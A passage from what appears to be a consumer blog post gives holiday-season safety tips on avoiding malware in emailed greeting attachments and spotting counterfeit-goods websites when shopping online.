Over this festive season people often send seasonal greetings via email rather than cards in the post. Occasionally, there will be attachments with holiday messages. However, beware of opening these attachments even if you recognise the name of the sender. Hackers have used personal details of people off the dark web to find targets. 

What to do?

Sometimes it is better to be safe than sorry. Due to the high risk of email attachments with malware, it might be best to abstain from clicking. Thanking the sender of the email for the seasonal greetings (before you have opened any attachment) could also make it clear whether they were the true sender or not, giving you more of an indication if the attachment is safe to open.

  1. Rip-off Goods

Although you might think you have used a reputable website to do your Christmas shopping, this still does not mean you have escaped the cyber criminals. There is still a chance you could be sent counterfeit goods. This is a problem, especially when the European Union Intellectual Property Office (EUIPO) reported that international trade in counterfeit products is now worth up £300 billion and in 2017, 15,000 online shoppers lost £11 million to scams.

There are many risks when buying counterfeit goods:

  • Not only are the products of bad quality but they are most likely unsafe (especially with electrical or medical products; they could be fatal)
  • Consumers need to be careful, as the websites which they might use for the purchase might then gain access to personal sensitive information (credit credentials), as well as expose their computer to malware/viruses.

What to do?

There are a couple ways you can avoid this:

  • If the price online looks really low you could be buying a ripped-off good. What might seem like a good deal, might be a waste of your time and money. 
  • Check the spelling and grammar of the website and the URL
  • Only use sites that are reputable: always make comparisons on different sites/forums that might say the website is fake
  • Watch out for pop-ups appearing asking you to confirm your card details before you are on the payment stage. 
  • Make sure you’ve installed the latest software & app updates

To wrap it all up

There are a lot of ways which you can avoid being hacked this Christmas. But if you are one of the unlucky ones, we hope our tips have helped you deal with the situation or informed you more on the matter.

TOP 10 HOLIDAY HACKS